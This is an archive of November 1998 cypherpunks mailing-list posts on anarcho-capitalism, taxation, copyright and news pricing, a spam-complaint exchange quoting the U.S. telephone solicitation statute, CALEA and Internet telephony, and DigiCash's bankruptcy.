From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 21:59:26 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
Message-ID: <199811101334.HAA17420@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 01:23:34 -0500
> From: Michael Hohensee <mah248@nyu.edu>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)

> > I'm still waiting for one of you guys to explain in detail how it works on a
> > day to day basis...
> 
> It works much the same as it does today, except that there isn't a
> parasitic state wasting resources on feeding a useless band of
> politicians, or pointing guns at people who don't obey its whims.

Cop-out. "It's the same but different" is spin-doctor bullshit.

Explain how the system works. Explain how the various systems operate, how
the costs are calculated, and how they're paid. I want to see the same level
of *specificity* that I and others have agreed to provide you in our
examples.

We want an answer not some glib off the shoulder quip.

[I'm deleting the rest of this since it doesn't answer any questions that
have been posed to the anarcho-whatever side]


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 22:07:09 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811101340.HAA17511@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 09:33:53 -0500
> From: Soren <sorens@workmail.com>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the
> 	  Foregone(fwd)

> Is there some specific reason they need to be large scale or long lasting?&nbsp;

Yes. There are the issues of human psychology which requires stable social
institutions, there is the question of economic fragility if the market is
too fragile or volatile. There is the question of long-term ownership of
property and services. It's hard to run a business if you don't know what
the rules will most likely be in a year or 10.

There are lots of reasons that social and political institutions should be
long-lived.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 22:07:28 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811101342.HAA17593@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Blanc" <blancw@cnw.com>
> Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
> Date: Mon, 9 Nov 1998 21:41:55 -0800

> 
> : Jesus, it's a miracle. Blanc and I actualy agree....I think
> : I'm gonna faint.
> ...................................................
> 
> 
> Eureka, success.
> Keep it in mind.   Everything I ever said that you disagreed with relates to
> that post.

Well I wouldn't jump too high Blanc, it's exactly what I've been saying for
most of my life. It's what I've included in dozens of posts over the last
few weeks regarding the *respect* of civil liberties and the individual.

Perhaps you were just to busy to actualy read them....


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 22:20:48 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)
Message-ID: <199811101343.HAA17689@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 13:24:23 +0000
> From: "Frank O'Dwyer" <fod@brd.ie>
> Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)

> Jim Choate wrote:
> > > You can make money from information provision by charging extra for
> > > up-to-date news, or by charging so little that the cost from the
> > > original provider is so low that it's not worth anyones time to
> > > redistribute it,
> > 
> > That's true now, why don't we see these effects...
> 
> We do. News inherently has a 'sell-by' date. The most obvious example is
> stock quotes where delayed quotes are provided for free whereas
> real-time quotes are heavily charged for. The recipients of such
> information care very much about latency, since it's possible to trade
> on any differences that may exist. There's even some research on attacks
> that simply delay packets in such networks.

Ah, true but I was addressing the last sentence about the cost being so low
nobody will charge for it.....sounds like the nuclear industry marketing
speal of the 50's....

Sorry for the confusion, I guess I should have edited the first part out
since it wasn't relevant.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 23:07:35 +0800
To: support@xroads.com
Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)
Message-ID: <199811101414.IAA17997@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Mr. or Ms. support@xroads.com,

I'd like to advise you of abuse of your system and the resultant spam that I
am receiving as a result.

I've checked my subscription list and it contains NO xroads.com subscribers
at all. You are apparently having legitimite, non-commercial traffic
forwarded to your site in order to cause excessive work and potential denial
of services (to your customers).

Please police your own house before you go around threatening $500 leins and
prosecution on others.

Have a nice day.



    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------



Forwarded message:

> From root@dogbert.xroads.com Tue Nov 10 07:52:20 1998
> Date: Tue, 10 Nov 1998 06:52:46 -0700 (MST)
> Message-Id: <199811101352.GAA09138@dogbert.xroads.com>
> To: owner-cypherpunks@einstein.ssz.com
> Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)
> References: <199811101343.HAA17689@einstein.ssz.com>
> In-Reply-To: <199811101343.HAA17689@einstein.ssz.com>
> From: abuse@xroads.com
> X-Loop: noloop@noloop.nlp
> 
> >Forwarded message:
> 
> >> Date: Tue, 10 Nov 1998 13:24:23 +0000
> >> From: "Frank O'Dwyer" <fod@brd.ie>
> >> Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)
> 
> >> Jim Choate wrote:
> >> > > You can make money from information provision by charging extra for
> >> > > up-to-date news, or by charging so little that the cost from the
> >> > > original provider is so low that it's not worth anyones time to
> >> > > redistribute it,
> >> > 
> >> > That's true now, why don't we see these effects...
> >> 
> >> We do. News inherently has a 'sell-by' date. The most obvious example is
> >> stock quotes where delayed quotes are provided for free whereas
> >> real-time quotes are heavily charged for. The recipients of such
> >> information care very much about latency, since it's possible to trade
> >> on any differences that may exist. There's even some research on attacks
> >> that simply delay packets in such networks.
> 
> >Ah, true but I was addressing the last sentence about the cost being so low
> >nobody will charge for it.....sounds like the nuclear industry marketing
> >speal of the 50's....
> 
> >Sorry for the confusion, I guess I should have edited the first part out
> >since it wasn't relevant.
> 
> 
> >    ____________________________________________________________________
> > 
> >            Lawyers ask the wrong questions when they don't want
> >            the right answers.
> 
> >                                        Scully (X-Files)
> 
> >       The Armadillo Group       ,::////;::-.          James Choate
> >       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
> >       www.ssz.com            .',  ||||    `/( e\      512-451-7087
> >                           -====~~mm-'`-```-mm --'-
> >    --------------------------------------------------------------------
> 
> This is apparently at least the second unsolicited commercial email from your 
> address. If you feel you have received this email in error, please contact 
> support@xroads.com
> 
> Senders of unsolicited commercial email will be charged $500 for each instance
> of unsolicited commerical email on Crossroads network systems, and are 
> subject to prosecution under the following Federal statute, and other 
> applicable federal and local laws.
> 
> 
>      * UNITED STATES CODE
>         
>           + TITLE 47 - TELEGRAPHS, TELEPHONES, AND RADIOTELEGRAPHS
>              
>                o CHAPTER 5 - WIRE OR RADIO COMMUNICATION
>                   
>                     # SUBCHAPTER II - COMMON CARRIERS 
>                       
>    
>      _________________________________________________________________
>    
>      227. Restrictions on use of telephone equipment
>      * (a) Definitions
>        
>        As used in this section -
>           + (1) The term ''automatic telephone dialing system'' means
>             equipment which has the capacity -
>                o (A) to store or produce telephone numbers to be called,
>                  using a random or sequential number generator; and
>                o (B) to dial such numbers.
>           + (2) The term ''telephone facsimile machine'' means equipment
>             which has the capacity (A) to transcribe text or images, or
>             both, from paper into an electronic signal and to transmit
>             that signal over a regular telephone line, or (B) to
>             transcribe text or images (or both) from an electronic signal
>             received over a regular telephone line onto paper.
>           + (3) The term ''telephone solicitation'' means the initiation
>             of a telephone call or message for the purpose of encouraging
>             the purchase or rental of, or investment in, property, goods,
>             or services, which is transmitted to any person, but such
>             term does not include a call or message (A) to any person
>             with that person's prior express invitation or permission,
>             (B) to any person with whom the caller has an established
>             business relationship, or (C) by a tax exempt nonprofit
>             organization.
>           + (4) The term ''unsolicited advertisement'' means any material
>             advertising the commercial availability or quality of any
>             property, goods, or services which is transmitted to any
>             person without that person's prior express invitation or
>             permission.
>      * (b) Restrictions on use of automated telephone equipment
>           + (1) Prohibitions
>             
>             It shall be unlawful for any person within the United States
>             -
>                o (A) to make any call (other than a call made for
>                  emergency purposes or made with the prior express
>                  consent of the called party) using any automatic
>                  telephone dialing system or an artificial or prerecorded
>                  voice -
>                     # (i) to any emergency telephone line (including any
>                       ''911'' line and any emergency line of a hospital,
>                       medical physician or service office, health care
>                       facility, poison control center, or fire protection
>                       or law enforcement agency);
>                     # (ii) to the telephone line of any guest room or
>                       patient room of a hospital, health care facility,
>                       elderly home, or similar establishment; or
>                     # (iii) to any telephone number assigned to a paging
>                       service, cellular telephone service, specialized
>                       mobile radio service, or other radio common carrier
>                       service, or any service for which the called party
>                       is charged for the call;
>                o (B) to initiate any telephone call to any residential
>                  telephone line using an artificial or prerecorded voice
>                  to deliver a message without the prior express consent
>                  of the called party, unless the call is initiated for
>                  emergency purposes or is exempted by rule or order by
>                  the Commission under paragraph (2)(B);
>                o (C) to use any telephone facsimile machine, computer, or
>                  other device to send an unsolicited advertisement to a
>                  telephone facsimile machine; or
>                o (D) to use an automatic telephone dialing system in such
>                  a way that two or more telephone lines of a multi-line
>                  business are engaged simultaneously.
>           + (2) Regulations; exemptions and other provisions
>             
>             The Commission shall prescribe regulations to implement the
>             requirements of this subsection. In implementing the
>             requirements of this subsection, the Commission -
>                o (A) shall consider prescribing regulations to allow
>                  businesses to avoid receiving calls made using an
>                  artificial or prerecorded voice to which they have not
>                  given their prior express consent;
>                o (B) may, by rule or order, exempt from the requirements
>                  of paragraph (1)(B) of this subsection, subject to such
>                  conditions as the Commission may prescribe -
>                     # (i) calls that are not made for a commercial
>                       purpose; and
>                     # (ii) such classes or categories of calls made for
>                       commercial purposes as the Commission determines -
>                          @ (I) will not adversely affect the privacy
>                            rights that this section is intended to
>                            protect; and
>                          @ (II) do not include the transmission of any
>                            unsolicited advertisement; and
>                o (C) may, by rule or order, exempt from the requirements
>                  of paragraphs (FOOTNOTE 1) (1)(A)(iii) of this
>                  subsection calls to a telephone number assigned to a
>                  cellular telephone service that are not charged to the
>                  called party, subject to such conditions as the
>                  Commission may prescribe as necessary in the interest of
>                  the privacy rights this section is intended to protect.
>                  (FOOTNOTE 1) So in original. Probably should be
>                  ''paragraph''.
>           + (3) Private right of action
>             
>             A person or entity may, if otherwise permitted by the laws or
>             rules of court of a State, bring in an appropriate court of
>             that State -
>                o (A) an action based on a violation of this subsection or
>                  the regulations prescribed under this subsection to
>                  enjoin such violation,
>                o (B) an action to recover for actual monetary loss from
>                  such a violation, or to receive $500 in damages for each
>                  such violation, whichever is greater, or
>                o (C) both such actions. If the court finds that the
>                  defendant willfully or knowingly violated this
>                  subsection or the regulations prescribed under this
>                  subsection, the court may, in its discretion, increase
>                  the amount of the award to an amount equal to not more
>                  than 3 times the amount available under subparagraph (B)
>                  of this paragraph.
>      * (c) Protection of subscriber privacy rights
>           + (1) Rulemaking proceeding required
>             
>             Within 120 days after December 20, 1991, the Commission shall
>             initiate a rulemaking proceeding concerning the need to
>             protect residential telephone subscribers' privacy rights to
>             avoid receiving telephone solicitations to which they object.
>             The proceeding shall -
>                o (A) compare and evaluate alternative methods and
>                  procedures (including the use of electronic databases,
>                  telephone network technologies, special directory
>                  markings, industry-based or company-specific ''do not
>                  call'' systems, and any other alternatives, individually
>                  or in combination) for their effectiveness in protecting
>                  such privacy rights, and in terms of their cost and
>                  other advantages and disadvantages;
>                o (B) evaluate the categories of public and private
>                  entities that would have the capacity to establish and
>                  administer such methods and procedures;
>                o (C) consider whether different methods and procedures
>                  may apply for local telephone solicitations, such as
>                  local telephone solicitations of small businesses or
>                  holders of second class mail permits;
>                o (D) consider whether there is a need for additional
>                  Commission authority to further restrict telephone
>                  solicitations, including those calls exempted under
>                  subsection (a)(3) of this section, and, if such a
>                  finding is made and supported by the record, propose
>                  specific restrictions to the Congress; and
>                o (E) develop proposed regulations to implement the
>                  methods and procedures that the Commission determines
>                  are most effective and efficient to accomplish the
>                  purposes of this section.
>           + (2) Regulations
>             
>             Not later than 9 months after December 20, 1991, the
>             Commission shall conclude the rulemaking proceeding initiated
>             under paragraph (1) and shall prescribe regulations to
>             implement methods and procedures for protecting the privacy
>             rights described in such paragraph in an efficient,
>             effective, and economic manner and without the imposition of
>             any additional charge to telephone subscribers.
>           + (3) Use of database permitted
>             
>             The regulations required by paragraph (2) may require the
>             establishment and operation of a single national database to
>             compile a list of telephone numbers of residential
>             subscribers who object to receiving telephone solicitations,
>             and to make that compiled list and parts thereof available
>             for purchase. If the Commission determines to require such a
>             database, such regulations shall -
>                o (A) specify a method by which the Commission will select
>                  an entity to administer such database;
>                o (B) require each common carrier providing telephone
>                  exchange service, in accordance with regulations
>                  prescribed by the Commission, to inform subscribers for
>                  telephone exchange service of the opportunity to provide
>                  notification, in accordance with regulations established
>                  under this paragraph, that such subscriber objects to
>                  receiving telephone solicitations;
>                o (C) specify the methods by which each telephone
>                  subscriber shall be informed, by the common carrier that
>                  provides local exchange service to that subscriber, of
>                  (i) the subscriber's right to give or revoke a
>                  notification of an objection under subparagraph (A), and
>                  (ii) the methods by which such right may be exercised by
>                  the subscriber;
>                o (D) specify the methods by which such objections shall
>                  be collected and added to the database;
>                o (E) prohibit any residential subscriber from being
>                  charged for giving or revoking such notification or for
>                  being included in a database compiled under this
>                  section;
>                o (F) prohibit any person from making or transmitting a
>                  telephone solicitation to the telephone number of any
>                  subscriber included in such database;
>                o (G) specify (i) the methods by which any person desiring
>                  to make or transmit telephone solicitations will obtain
>                  access to the database, by area code or local exchange
>                  prefix, as required to avoid calling the telephone
>                  numbers of subscribers included in such database; and
>                  (ii) the costs to be recovered from such persons;
>                o (H) specify the methods for recovering, from persons
>                  accessing such database, the costs involved in
>                  identifying, collecting, updating, disseminating, and
>                  selling, and other activities relating to, the
>                  operations of the database that are incurred by the
>                  entities carrying out those activities;
>                o (I) specify the frequency with which such database will
>                  be updated and specify the method by which such updating
>                  will take effect for purposes of compliance with the
>                  regulations prescribed under this subsection;
>                o (J) be designed to enable States to use the database
>                  mechanism selected by the Commission for purposes of
>                  administering or enforcing State law;
>                o (K) prohibit the use of such database for any purpose
>                  other than compliance with the requirements of this
>                  section and any such State law and specify methods for
>                  protection of the privacy rights of persons whose
>                  numbers are included in such database; and
>                o (L) require each common carrier providing services to
>                  any person for the purpose of making telephone
>                  solicitations to notify such person of the requirements
>                  of this section and the regulations thereunder.
>           + (4) Considerations required for use of database method
>             
>             If the Commission determines to require the database
>             mechanism described in paragraph (3), the Commission shall -
>                o (A) in developing procedures for gaining access to the
>                  database, consider the different needs of telemarketers
>                  conducting business on a national, regional, State, or
>                  local level;
>                o (B) develop a fee schedule or price structure for
>                  recouping the cost of such database that recognizes such
>                  differences and -
>                     # (i) reflect the relative costs of providing a
>                       national, regional, State, or local list of phone
>                       numbers of subscribers who object to receiving
>                       telephone solicitations;
>                     # (ii) reflect the relative costs of providing such
>                       lists on paper or electronic media; and
>                     # (iii) not place an unreasonable financial burden on
>                       small businesses; and
>                o (C) consider (i) whether the needs of telemarketers
>                  operating on a local basis could be met through special
>                  markings of area white pages directories, and (ii) if
>                  such directories are needed as an adjunct to database
>                  lists prepared by area code and local exchange prefix.
>           + (5) Private right of action
>             
>             A person who has received more than one telephone call within
>             any 12-month period by or on behalf of the same entity in
>             violation of the regulations prescribed under this subsection
>             may, if otherwise permitted by the laws or rules of court of
>             a State bring in an appropriate court of that State -
>                o (A) an action based on a violation of the regulations
>                  prescribed under this subsection to enjoin such
>                  violation,
>                o (B) an action to recover for actual monetary loss from
>                  such a violation, or to receive up to $500 in damages
>                  for each such violation, whichever is greater, or
>                o (C) both such actions. It shall be an affirmative
>                  defense in any action brought under this paragraph that
>                  the defendant has established and implemented, with due
>                  care, reasonable practices and procedures to effectively
>                  prevent telephone solicitations in violation of the
>                  regulations prescribed under this subsection. If the
>                  court finds that the defendant willfully or knowingly
>                  violated the regulations prescribed under this
>                  subsection, the court may, in its discretion, increase
>                  the amount of the award to an amount equal to not more
>                  than 3 times the amount available under subparagraph (B)
>                  of this paragraph.
>           + (6) Relation to subsection (b)
>             
>             The provisions of this subsection shall not be construed to
>             permit a communication prohibited by subsection (b) of this
>             section.
>      * (d) Technical and procedural standards
>           + (1) Prohibition
>             
>             It shall be unlawful for any person within the United States
>             -
>                o (A) to initiate any communication using a telephone
>                  facsimile machine, or to make any telephone call using
>                  any automatic telephone dialing system, that does not
>                  comply with the technical and procedural standards
>                  prescribed under this subsection, or to use any
>                  telephone facsimile machine or automatic telephone
>                  dialing system in a manner that does not comply with
>                  such standards; or
>                o (B) to use a computer or other electronic device to send
>                  any message via a telephone facsimile machine unless
>                  such person clearly marks, in a margin at the top or
>                  bottom of each transmitted page of the message or on the
>                  first page of the transmission, the date and time it is
>                  sent and an identification of the business, other
>                  entity, or individual sending the message and the
>                  telephone number of the sending machine or of such
>                  business, other entity, or individual.
>           + (2) Telephone facsimile machines
>             
>             The Commission shall revise the regulations setting technical
>             and procedural standards for telephone facsimile machines to
>             require that any such machine which is manufactured after one
>             year after December 20, 1991, clearly marks, in a margin at
>             the top or bottom of each transmitted page or on the first
>             page of each transmission, the date and time sent, an
>             identification of the business, other entity, or individual
>             sending the message, and the telephone number of the sending
>             machine or of such business, other entity, or individual.
>           + (3) Artificial or prerecorded voice systems
>             
>             The Commission shall prescribe technical and procedural
>             standards for systems that are used to transmit any
>             artificial or prerecorded voice message via telephone. Such
>             standards shall require that -
>                o (A) all artificial or prerecorded telephone messages (i)
>                  shall, at the beginning of the message, state clearly
>                  the identity of the business, individual, or other
>                  entity initiating the call, and (ii) shall, during or
>                  after the message, state clearly the telephone number or
>                  address of such business, other entity, or individual;
>                  and
>                o (B) any such system will automatically release the
>                  called party's line within 5 seconds of the time
>                  notification is transmitted to the system that the
>                  called party has hung up, to allow the called party's
>                  line to be used to make or receive other calls.
>      * (e) Effect on State law
>           + (1) State law not preempted
>             
>             Except for the standards prescribed under subsection (d) of
>             this section and subject to paragraph (2) of this subsection,
>             nothing in this section or in the regulations prescribed
>             under this section shall preempt any State law that imposes
>             more restrictive intrastate requirements or regulations on,
>             or which prohibits -
>                o (A) the use of telephone facsimile machines or other
>                  electronic devices to send unsolicited advertisements;
>                o (B) the use of automatic telephone dialing systems;
>                o (C) the use of artificial or prerecorded voice messages;
>                  or
>                o (D) the making of telephone solicitations.
>           + (2) State use of databases
>             
>             If, pursuant to subsection (c)(3) of this section, the
>             Commission requires the establishment of a single national
>             database of telephone numbers of subscribers who object to
>             receiving telephone solicitations, a State or local authority
>             may not, in its regulation of telephone solicitations,
>             require the use of any database, list, or listing system that
>             does not include the part of such single national datebase
>             (FOOTNOTE 2) that relates to such State.
>             
>             (FOOTNOTE 2) So in original. Probably should be ''database''.
>      * (f) Actions by States
>           + (1) Authority of States
>             
>             Whenever the attorney general of a State, or an official or
>             agency designated by a State, has reason to believe that any
>             person has engaged or is engaging in a pattern or practice of
>             telephone calls or other transmissions to residents of that
>             State in violation of this section or the regulations
>             prescribed under this section, the State may bring a civil
>             action on behalf of its residents to enjoin such calls, an
>             action to recover for actual monetary loss or receive $500 in
>             damages for each violation, or both such actions. If the
>             court finds the defendant willfully or knowingly violated
>             such regulations, the court may, in its discretion, increase
>             the amount of the award to an amount equal to not more than 3
>             times the amount available under the preceding sentence.
>           + (2) Exclusive jurisdiction of Federal courts
>             
>             The district courts of the United States, the United States
>             courts of any territory, and the District Court of the United
>             States for the District of Columbia shall have exclusive
>             jurisdiction over all civil actions brought under this
>             subsection. Upon proper application, such courts shall also
>             have jurisdiction to issue writs of mandamus, or orders
>             affording like relief, commanding the defendant to comply
>             with the provisions of this section or regulations prescribed
>             under this section, including the requirement that the
>             defendant take such action as is necessary to remove the
>             danger of such violation. Upon a proper showing, a permanent
>             or temporary injunction or restraining order shall be granted
>             without bond.
>           + (3) Rights of Commission
>             
>             The State shall serve prior written notice of any such civil
>             action upon the Commission and provide the Commission with a
>             copy of its complaint, except in any case where such prior
>             notice is not feasible, in which case the State shall serve
>             such notice immediately upon instituting such action. The
>             Commission shall have the right (A) to intervene in the
>             action, (B) upon so intervening, to be heard on all matters
>             arising therein, and (C) to file petitions for appeal.
>           + (4) Venue; service of process
>             
>             Any civil action brought under this subsection in a district
>             court of the United States may be brought in the district
>             wherein the defendant is found or is an inhabitant or
>             transacts business or wherein the violation occurred or is
>             occurring, and process in such cases may be served in any
>             district in which the defendant is an inhabitant or where the
>             defendant may be found.
>           + (5) Investigatory powers
>             
>             For purposes of bringing any civil action under this
>             subsection, nothing in this section shall prevent the
>             attorney general of a State, or an official or agency
>             designated by a State, from exercising the powers conferred
>             on the attorney general or such official by the laws of such
>             State to conduct investigations or to administer oaths or
>             affirmations or to compel the attendance of witnesses or the
>             production of documentary and other evidence.
>           + (6) Effect on State court proceedings
>             
>             Nothing contained in this subsection shall be construed to
>             prohibit an authorized State official from proceeding in
>             State court on the basis of an alleged violation of any
>             general civil or criminal statute of such State.
>           + (7) Limitation
>             
>             Whenever the Commission has instituted a civil action for
>             violation of regulations prescribed under this section, no
>             State may, during the pendency of such action instituted by
>             the Commission, subsequently institute a civil action against
>             any defendant named in the Commission's complaint for any
>             violation as alleged in the Commission's complaint.
>           + (8) ''Attorney general'' defined
>             
>             As used in this subsection, the term ''attorney general''
>             means the chief legal officer of a State.
>             
>    
>      _________________________________________________________________
>    
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 10 Nov 1998 21:55:10 +0800
To: cypherpunks@cyberpass.net
Subject: CALEA likely will cover Internet telephony
Message-ID: <199811101330.FAA08525@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Tue, 10 Nov 1998 08:30:19 -0500
>To: politech@vorlon.mit.edu
>From: Declan McCullagh <declan@well.com>
>Subject: Wiretapping law likely will cover Internet telephony
>
>[Any blame should not properly go to the FCC but Congress, which voted for
Digital Telephony/CALEA in the first place. --Declan]
>
>===
>
>http://www.wired.com/news/news/politics/story/16146.html
>
>                     Wiretapping Internet Phone Lines
>                     by Declan McCullagh 
>
>                     4:00 a.m.  10.Nov.98.PST
>                     A federal wiretapping law designed to let
>                     police snoop on telephone calls could
>                     have profound implications for companies
>                     that offer Internet phone service.
>
>                     [...]
>
>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Tue, 10 Nov 1998 21:39:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <199811100336.VAA15683@einstein.ssz.com>
Message-ID: <364848CB.A2260BA8@workmail.com>
MIME-Version: 1.0
Content-Type: text/html




Jim Choate wrote:
> Air traffic controlling
When you buy your ticket from a commercial carrier and don't present
a tax
receipt your ticket price goes WAY! up.
> Food and Drug Administration approvals
When you buy food or drugs if you don't present your tax receipt then
you
pay the full price for foods and drugs.
 
Very little explication of the difference between indirect taxes and direct. 
The compromize that most libertarians propose (to anarcho-capitalists),
is that indirect (viz: consumption) taxes allow freedom of choice as opposed
to direct taxes (viz: 'income' taxes). I.e., don't want to pay taxes on
it? don't buy it.
This also provides an outlet for the social do-gooders to create their
utopias by vastly inflating those taxes associated with less favored consumables
(tobacco, alcohol, guns, McD's, anchovies). This is not such a bad thing
as it may seem, as you can always elect to vote with your feet and relocate
yourself to where the local population agree with you as to what should
be heavily taxed, and what not.  Perhaps this is why there were multiple
states in the US rather than a single homogenous state, prior to Honest
(I am not a crook) Abe?
Last time I looked at it, there were 108 separate taxes included in
the retail cost of an egg and 112 for a loaf of bread, so yes, I would
prefer to pay the full price, sans taxes, please. The same goes for travel
via airline.  Not so many taxen, just heftier ones at each step --
something like 15 at last count (fuel, landing contracts, use of airspace,
airport property taxes, country exit taxes ...).
Direct taxes, without apportionment to the states, are illegal in the
US. Says so right there in the constitution.  The 16th didn't confer
any more abilities on the federal government to sidestep this restriction. 
In fact, direct taxes were (and legally still are), only applicable to
federal employees and those who reside within the boundaries of federal
jurisdiction (Washington D.C, land leased from the states, certain offshore
islands such as Johnston Atoll, Guam ships and planes of federal registry
...).  So if you think paying federal direct taxes is the solution
to society's ills, join the federal payroll, become a ward of the state.
With the direct taxes you are already (voluntarily) paying, you are already
halfway there.
One question for the socialists out there;  when is the promised
egalitarian utopia  going to kick in?  It doesn't seem to be
getting any closer.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Tue, 10 Nov 1998 22:03:03 +0800
To: cyphers <cypherpunks@cyberpass.net>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the  Foregone(fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B276@yarrowbay.chaffeyhomes.com>
Message-ID: <36484ED1.6F3B9F1E@workmail.com>
MIME-Version: 1.0
Content-Type: text/html




Albert P. Franco, II wrote:
I've been lurking on this thread for a while, and
I am amazed by the level
of utopist muck that is being spewed here by you.
Without some government the Bad Guys will be the only ones with anything.
It is only with the threat of losing their power that leaders do good.
If
they had no power which could be lost or taken they will always do
what's
best for them in the short term, which is usually to shit on the peons.
Dictators (like Pinochet and Gates) do their dirty deeds because they
feel
no need to placate the masses.
And the Bad Guys don't have everything already? Are they in any danger
of losing their power?
 
This anarcho-capitalist spew is so much crap that the bullshit indicators
are blaring at top volume. If the people can't control a constitutional
government, known for having peacefully free elections for over two
hundred
years, then how the hell do think you can convince somebody that the
people
are going to be able to control warlords and monopolies. It's called,
"You
don't like it? Bang, Bang, you're dead!"
And this differs from living in in a 1st world state, how?
Try to lift yourself out of the bullshit of your
theory and give us at
least one REAL example (current or historic) of a large scale, long
lasting
anarcho-capitalist society. Hippie communes are too small, and make
sure
it's capitalistic. If you can't think of one in the next year or so
then
come back and tell us.
Is there some specific reason they need to be large scale or long lasting? 
By definition, anarcho-capitalism is constantly changing -- perhaps as
much as between extreme individualism, to the current state of feudalism
that has pervaded the world since the birth of agrarianism.
I agree with you that most utopianist ranting here carries a strong
whiff of frustration and steam venting.  To those anarcho-capitalists,
I recommend the course of action I took 25 years ago.  If you don't
like the state you live in, don't patronize it.  There are many save
harbors in the world that better approach your ideals, and are more amenable
to change, than the Union of Socialist Americans.
"Educate, don't agitate".
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 10 Nov 1998 23:51:23 +0800
To: cypherpunks@toad.com
Subject: American Banker article on DigiCash bankruptcy
Message-ID: <v04020a1eb26e03909187@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Tue, 10 Nov 1998 07:36:45 -0500
To: Digital Bearer Settlement List <dbs@philodox.com>
From: Robert Hettinga <rah@shipwright.com>
Subject: American Banker article on DigiCash bankruptcy
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/


--- begin forwarded text


Date: Tue, 10 Nov 1998 12:23:36 +0100 (MET)
From: Somebody
To: rah@shipwright.com
Subject: American Banker article on DigiCash bankruptcy

From: Somebody Else
To: Somebody
Date: Tue, 10 Nov 1998 05:41:36 -0500

<Somebody>,

This is the American Banker article on the subject:

Digital Frontiers
Tuesday, November 10, 1998

Electronic Commerce: Bankrupt Digicash to Seek Financing, New Allies
By Jeffrey Kutler & Carol Power
Digicash Inc., which invented a virtual cash concept for the Internet,
now must reinvent itself.

